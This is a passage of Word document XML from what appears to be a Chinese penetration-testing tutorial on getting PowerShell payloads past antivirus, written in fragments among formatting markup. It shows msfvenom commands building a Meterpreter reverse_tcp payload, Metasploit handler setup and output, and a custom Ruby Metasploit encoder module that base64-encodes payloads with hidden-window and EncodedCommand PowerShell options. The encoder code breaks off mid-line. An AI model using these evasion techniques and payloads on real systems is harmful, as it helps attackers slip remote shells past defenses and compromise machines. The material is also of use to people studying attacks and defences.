          <w:spacing w:val="-9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PresentationFramework;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[System.Windows.MessageBox]::Show(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Micropoor'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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0000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上文所说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>越来越多的杀软开始对抗，powershell的部分行为，或者特征。以msfvenom为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="10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0000"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，生成payload。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opoor.ps1不幸被杀。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90.599pt;width:331.800pt;height:147.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:256.800pt;width:421.800pt;height:171.6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2"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对powershell特性，更改pay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load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接下来考虑的事情是如何把以上重复的工作变成自动化，并且针对power</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell，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4"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DownloadS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="104"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tring特性，设计出2种payload形式：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（1）目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标机出网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（2）目标机不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出网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并且根据需求，无缝连接Metasp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>loit。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根据微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软文档，可以找到可能对以上有帮助的属性，分别为：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1120" w:right="8484" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="111"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="111"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indowStyle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="111"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="103"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="103"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exit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28"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>En</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="128"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>codedCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="128"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="106"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:w w:val="106"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xec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自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>动化实现如下：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copy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base64.rb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to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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metasploit-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48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1914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framework/embedded/framework/modules/encoders/powershell.If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powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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is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empty,mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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powershell.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pacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E.g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48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msf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encoder(powershell/base64)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&gt;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use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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exploit/multi/handler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48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msf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exploit(multi/handler)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&gt;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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-5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payload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48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pacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="006900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indows/x64/meterpreter/reverse_tcp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48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payload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=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-5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windows/x64/meterpreter/reverse_tcp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48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msf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exploit(multi/handler)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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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exploit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msfvenom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-p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windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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LHOST=xx.xx.xx.xx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48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2274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LPORT=xx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psh-reflection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|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msfvenom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powershell/base64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  <w:spacing w:val="1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080"/>
        </w:tabs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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="006900"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[*]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Started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reverse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TCP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handler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on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-5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xx.1xx.xx.xx:xx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a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>class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5b2498"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MetasploitModule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&lt;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Msf::Encoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rank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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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NormalRanking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="208" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-1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initialize</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(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121"/>
        </w:tabs>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Name'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;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'Powershell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Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6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Encoder'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121"/>
        </w:tabs>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Description'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;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%q{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48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1914" w:firstLine="960"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom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-p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windows/x64/meterpreter/reverse_tcp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LHOST=xx.xx.xx.xx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LPORT=xx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psh-reflection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windows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|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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6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powershell/base64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  <w:spacing w:val="1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windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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121"/>
        </w:tabs>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Author'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;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'Micropoor'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121"/>
        </w:tabs>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Arch'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;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ARCH_CMD,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121"/>
        </w:tabs>
        <w:spacing w:before="48" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'Platform'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;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'win'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>egister_options([</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1840" w:right="2515" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OptBool.new(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'payload'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[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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false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'Use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payload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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6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]),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OptBool.new(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="c31914"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'x64'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[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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false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'Use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syswow64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powershell'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-11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])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="208" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="208" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="a90c90"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def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encode_block(state,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buf)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="48" w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="1600" w:right="3115" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>base64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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-7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Rex::Text.encode_base64(Rex::Text.to_unicode(buf))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cmd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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2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451.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9030" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:9030;width:8990;height:670" coordorigin="1490,9030" coordsize="8990,670" path="m1510,9044l1510,9044,1510,9044,1510,9044,1510,9044,1510,9044,1510,9044,1511,9044,1512,9044,1512,9044,1514,9044,1515,9044,1517,9044,1519,9044,1521,9044,1524,9044,1528,9044,1532,9044,1536,9044,1541,9044,1546,9044,1552,9044,1559,9044,1566,9044,1575,9044,1583,9044,1593,9044,1603,9044,1615,9044,1627,9044,1640,9044,1654,9044,1668,9044,1684,9044,1701,9044,1719,9044,1738,9044,1758,9044,1780,9044,1802,9044,1826,9044,1851,9044,1877,9044,1904,9044,1933,9044,1963,9044,1995,9044,2028,9044,2063,9044,2099,9044,2136,9044,2175,9044,2216,9044,2259,9044,2303,9044,2348,9044,2396,9044,2445,9044,2496,9044,2549,9044,2604,9044,2660,9044,2719,9044,2779,9044,2841,9044,2906,9044,2972,9044,3041,9044,3112,9044,3184,9044,3259,9044,3336,9044,3416,9044,3498,9044,3582,9044,3668,9044,3757,9044,3848,9044,3941,9044,4037,9044,4136,9044,4236,9044,4340,9044,4446,9044,4555,9044,4666,9044,4780,9044,4897,9044,5017,9044,5139,9044,5264,9044,5392,9044,5523,9044,5657,9044,5793,9044,5933,9044,6076,9044,6222,9044,6370,9044,6522,9044,6677,9044,6835,9044,6997,9044,7161,9044,7329,9044,7500,9044,7675,9044,7853,9044,8034,9044,8219,9044,8407,9044,8598,9044,8793,9044,8992,9044,9194,9044,9400,9044,9609,9044,9823,9044,10039,9044,10260,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9044,10484,9045,10484,9045,10484,9045,10484,9046,10484,9046,10484,9046,10484,9047,10484,9047,10484,9048,10484,9048,10484,9049,10484,9050,10484,9051